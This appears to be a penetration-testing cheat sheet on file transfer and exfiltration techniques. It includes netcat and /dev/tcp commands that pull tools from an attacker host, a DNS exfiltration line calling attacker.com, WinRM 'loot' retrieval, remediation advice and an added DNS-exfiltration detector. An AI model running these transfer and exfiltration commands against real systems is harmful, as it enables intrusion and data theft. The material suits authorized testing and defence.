Methodology Checklist
- SMB server: impacket-smbserver share . -smb2support -user [USER] -password [PASS]
- Windows SMB copy: net use \\[LHOST]\share /user:[USER] [PASS], then copy \\[LHOST]\share\[FILE]
- FTP upload: host a pyftpdlib server, connect from the target
- TFTP (Windows XP/2003): tftp -i [LHOST] GET [FILE]
- RDP clipboard paste for small files
- Verify all transferred files are cleaned up post-engagement
Operational Context
Use when: Standard HTTP/SCP/SMB transfer methods are all blocked; reach for edge-case channels: RDP clipboard, TFTP, FTP anonymous push, DNS exfil.
Think Dumber First: RDP clipboard paste is the most overlooked transfer method. If you have RDP, open Notepad, paste base64-encoded content from the clipboard, save the file, and decode it. No network rules fire.
Skip when: Standard methods work; misc techniques add complexity with no benefit.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| nc -lvnp [PORT] > [FILE] | Netcat listener, receives file (victim listens) |
| nc -q 0 [TARGET_IP] [PORT] < [FILE] | Netcat send file to listener |
| ncat -l -p [PORT] --recv-only > [FILE] | Ncat receiver (closes after transfer) |
| ncat --send-only [TARGET_IP] [PORT] < [FILE] | Ncat sender (terminates after input sent) |
| sudo nc -l -p 443 -q 0 < [FILE] | Attacker listens, serves file (reverse nc transfer) |
| nc [TARGET_IP] 443 > [FILE] | Victim connects to attacker, receives file |
| cat < /dev/tcp/[TARGET_IP]/443 > [FILE] | Bash /dev/tcp receive (no nc needed) |
| Test-NetConnection -ComputerName DATABASE01 -Port 5985 | WinRM connectivity check |
| $Session = New-PSSession -ComputerName DATABASE01 | Create WinRM PSSession |
| Copy-Item -Path C:\file.txt -ToSession $Session -Destination C:\Users\Admin\Desktop\ | Upload via WinRM session |
| Copy-Item -Path "C:\Users\Admin\Desktop\file.txt" -Destination C:\ -FromSession $Session | Download via WinRM session |
| rdesktop [TARGET_IP] -d [DOMAIN] -u [USER] -p '[PASS]' -r disk:linux='/home/user/files' | Mount local dir into RDP (rdesktop) |
| xfreerdp3 /v:[TARGET_IP] /d:[DOMAIN] /u:[USER] /p:'[PASS]' /drive:linux,/home/user/files | Mount local dir into RDP (xfreerdp) |
Deep Dive & Workflow
Netcat Transfer Patterns
Pattern A: Victim Listens (Inbound Allowed)
```bash
# Victim (receiver)
nc -lvnp 8000 > received.exe
# Attacker (sender)
nc -q 0 [VICTIM_IP] 8000 < tool.exe
```
Use when: No inbound firewall blocking on the victim.
Pattern B: Attacker Listens (Inbound Blocked on Victim)
```bash
# Attacker (serves file)
sudo nc -l -p 443 -q 0 < tool.exe
# Victim (connects and receives)
nc [ATTACKER_IP] 443 > tool.exe
```
Use when: Victim is behind a firewall blocking inbound. The victim "calls home."
Pattern C: Bash /dev/tcp (No nc on Victim)
```bash
# Attacker
sudo nc -l -p 443 -q 0 < tool.exe
# Victim (pure bash, no tools needed)
cat < /dev/tcp/[ATTACKER_IP]/443 > tool.exe
```
Critical fallback when nc has been stripped from the target.
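Pattern B carried through in Python as an added example (not code from the original page): both sides run on localhost with a constructed payload, the sender half-closes after the last byte so the receiver's read loop ends (the job of -q 0 / --send-only), and the two SHA-256 digests are compared, which is the check a bare nc pipeline never performs.

```python
import hashlib
import socket
import threading

# Constructed stand-in for tool.exe: 10 242 arbitrary bytes, not a real binary.
SAMPLE_FILE = b"MZ" + bytes(range(256)) * 40


def serve_once(data: bytes, host: str = "127.0.0.1") -> int:
    """Attacker-listens side of Pattern B (sudo nc -l -p 443 -q 0 < file):
    accept one client, stream the bytes, then half-close so the receiver
    sees EOF. Returns the ephemeral port the receiver should connect to."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def handler() -> None:
        conn, _ = srv.accept()
        with conn:
            conn.sendall(data)
            conn.shutdown(socket.SHUT_WR)  # the EOF that -q 0 / --send-only provide
        srv.close()

    threading.Thread(target=handler, daemon=True).start()
    return port


def receive_all(host: str, port: int) -> bytes:
    """Victim side (nc [ATTACKER_IP] 443 > file): connect out and read until
    the sender closes. If the sender never closes, this loop never ends."""
    chunks = []
    with socket.create_connection((host, port)) as conn:
        while True:
            buf = conn.recv(65536)
            if not buf:
                break
            chunks.append(buf)
    return b"".join(chunks)


def transfer_and_verify(data: bytes = SAMPLE_FILE) -> bool:
    """Run both sides on localhost and compare SHA-256 digests: the check a
    bare nc pipeline lacks, since a truncated transfer still leaves a file."""
    port = serve_once(data)
    received = receive_all("127.0.0.1", port)
    return hashlib.sha256(received).digest() == hashlib.sha256(data).digest()


if __name__ == "__main__":
    print("integrity ok" if transfer_and_verify() else "MISMATCH")
```

In the field the same check is sha256sum on both ends before the file is trusted.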
WinRM / PSSession File Transfer
Requires: Admin rights, membership in the Remote Management Users group, and port TCP/5985 (HTTP) or TCP/5986 (HTTPS).
```powershell
$Session = New-PSSession -ComputerName DATABASE01
# Upload (local -> remote)
Copy-Item -Path C:\tool.exe -ToSession $Session -Destination C:\Windows\Temp\
# Download (remote -> local)
Copy-Item -Path "C:\loot.zip" -Destination C:\ -FromSession $Session
```
Useful when HTTP/SMB are blocked but WinRM is allowed (common in enterprise networks).
RDP Drive Mapping
The mounted share appears at \\tsclient\<sharename> inside the RDP session:
- Navigate to \\tsclient\linux in File Explorer
- Copy/paste files as normal
- Best for large files (BloodHound ingestors, mimikatz); avoids AV network filters
Firewall Decision Matrix
| Inbound to Victim | Outbound from Victim | Best Method |
|---|---|---|
| Allowed | Allowed | Pattern A (victim listens) |
| Blocked | Allowed | Pattern B (attacker listens) |
| Blocked | Blocked | WinRM, RDP drive, Base64 |
| No tools | Allowed | Bash /dev/tcp |
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| RDP clipboard transfer fails | Clipboard redirection disabled | Check RDP session settings; enable via Group Policy or /clipboard flag in xfreerdp |
| TFTP transfer times out | UDP blocked | Confirm: nmap -sU -p 69 [TARGET]; TFTP is UDP-only, so TCP alternatives won't work |
| DNS exfil too slow | Large file | Use for small files only (<10KB); split and exfil in chunks: dig $(base64 chunk).attacker.com |
| FTP anonymous push rejected | FTP anonymous write not enabled | Confirm: ftp [TARGET], log in as anonymous, put file, check write permission |
| WebDAV upload returns 405 | PUT method disabled | Enable PUT in web server config or use PROPFIND first to confirm WebDAV is active |
Reporting Trigger
Finding Title: Alternative File Transfer Channel Bypasses Standard Controls
Impact: Edge-case transfer methods (RDP clipboard, TFTP, DNS) evade network controls focused on HTTP/SMB, enabling payload delivery and data exfiltration through unconventional channels.
Root Cause: Security monitoring focused on common protocols fails to detect transfers via alternative channels. RDP clipboard redirection and TFTP are often explicitly permitted for IT operations.
Recommendation: Restrict RDP clipboard redirection in GPO for untrusted sessions. Block TFTP (UDP/69) at the perimeter. Implement DNS query monitoring to detect unusual query volumes indicative of DNS exfiltration.
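To make the DNS-monitoring recommendation concrete, an added example (not part of the original page) that flags the query shape left behind by dig $(base64 chunk).attacker.com: one client sending many distinct, long, high-entropy subdomains under a single domain. The log format, the sample lines, and the thresholds are all assumptions constructed here.

```python
import math
import re
from collections import defaultdict

# Constructed DNS query log (assumed format: timestamp client qname qtype).
# The attacker.com subdomains are base64 of "This is chunk 1" ... "chunk 6".
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 www.example.com A
2024-05-01T10:00:02Z 10.0.0.5 mail.example.com MX
2024-05-01T10:00:03Z 10.0.0.9 VGhpcyBpcyBjaHVuayAx.attacker.com A
2024-05-01T10:00:03Z 10.0.0.9 VGhpcyBpcyBjaHVuayAy.attacker.com A
2024-05-01T10:00:04Z 10.0.0.9 VGhpcyBpcyBjaHVuayAz.attacker.com A
2024-05-01T10:00:04Z 10.0.0.9 VGhpcyBpcyBjaHVuayA0.attacker.com A
2024-05-01T10:00:05Z 10.0.0.9 VGhpcyBpcyBjaHVuayA1.attacker.com A
2024-05-01T10:00:05Z 10.0.0.9 VGhpcyBpcyBjaHVuayA2.attacker.com A
2024-05-01T10:00:06Z 10.0.0.5 cdn.example.com A
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def shannon_entropy(s: str) -> float:
    """Bits per character: base64 chunks score high, labels like www low."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def detect_dns_exfil(log: str, min_len: int = 16, min_entropy: float = 3.0,
                     min_unique: int = 5) -> list:
    """Return (client, domain, count) for clients sending many distinct long,
    high-entropy subdomains to one domain: the footprint of running
    dig $(base64 chunk).attacker.com once per chunk."""
    seen = defaultdict(set)
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the pass
        _, client, qname, _ = m.groups()
        labels = qname.rstrip(".").split(".")
        # Last two labels taken as the registrable domain (assumption; use a
        # public suffix list in production), everything before them as payload.
        domain, sub = ".".join(labels[-2:]), ".".join(labels[:-2])
        if len(sub) >= min_len and shannon_entropy(sub) >= min_entropy:
            seen[(client, domain)].add(sub)
    return sorted((c, d, len(subs)) for (c, d), subs in seen.items()
                  if len(subs) >= min_unique)


if __name__ == "__main__":
    for client, domain, count in detect_dns_exfil(SAMPLE_LOG):
        print(f"{client} -> {domain}: {count} distinct encoded labels")
```

Tune min_unique against the baseline of your own resolver logs; CDNs and some security products also emit long machine-generated labels.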